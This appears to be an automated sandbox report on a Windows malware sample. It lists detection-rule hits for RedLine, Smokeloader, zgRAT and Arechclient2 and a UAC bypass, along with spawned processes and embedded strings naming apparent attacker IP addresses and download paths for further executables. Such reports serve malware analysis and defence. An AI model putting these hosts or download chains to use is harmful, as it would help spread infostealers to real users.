Source: 21.2.cmd.exe.4a3d264.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.3f9086d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.run.exe.39e0d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5240264.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.3fd4d5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5c100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\ougwwmmp, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, CoreEventSource.cs

Task registration methods: 'MetricManagerCreatedTasks'

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, BaseDefaultHeartbeatPropertyProvider.cs	Suspicious method names: .BaseDefaultHeartbeatPropertyProvider.SetDefaultPayload
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.CopyGlobalPropertiesIfRequired
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.ProcessOperationStop
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.Process
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.ProcessOperationStart
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.WriteEvent
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.Dispose
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, IHeartbeatDefaultPayloadProvider.cs	Suspicious method names: ..SetDefaultPayload
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, HeartbeatDefaultPayload.cs	Suspicious method names: .HeartbeatDefaultPayload.IsDefaultKeyword
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be149f0.5.raw.unpack, HeartbeatDefaultPayload.cs	Suspicious method names: .HeartbeatDefaultPayload.PopulateDefaultPayload

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/71@6/8

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Code function: 1_2_6BA77030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6BA77030

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_0017D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

2_2_0017D660

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_04195BD6 CreateToolhelp32Snapshot,Module32First,

0_2_04195BD6

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_00158040 LoadResource,LockResource,SizeofResource,

2_2_00158040

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7364
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File created: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Jump to behavior

Source: Yara match	File source: 5.0.u5mc.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.1816333516.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1816995670.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: one	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: one	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: one	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: @	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.90	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: Installed	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: Installed	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.203	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.59	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /timeSync.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /syncUpd.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /1/Package.zip	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .zip	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .zip	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: \run.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: \run.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: 185.172.128.228	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: /BroomSetup.exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_05C14C75
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Command line argument: .exe	0_2_05C14C75

Source: QPoX60yhZt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5mc.0.exe, u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5mc.0.exe, 00000001.00000003.1747773973.00000000245B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5mc.0.exe, 00000001.00000002.2187565131.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000002.2172694961.000000001E631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: QPoX60yhZt.exe

Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File read: C:\Users\user\Desktop\QPoX60yhZt.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QPoX60yhZt.exe "C:\Users\user\Desktop\QPoX60yhZt.exe"
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.0.exe "C:\Users\user\AppData\Local\Temp\u5mc.0.exe"
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.3.exe "C:\Users\user\AppData\Local\Temp\u5mc.3.exe"
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 1132
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5mc.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 2036
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.0.exe "C:\Users\user\AppData\Local\Temp\u5mc.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Process created: C:\Users\user\AppData\Local\Temp\u5mc.3.exe "C:\Users\user\AppData\Local\Temp\u5mc.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
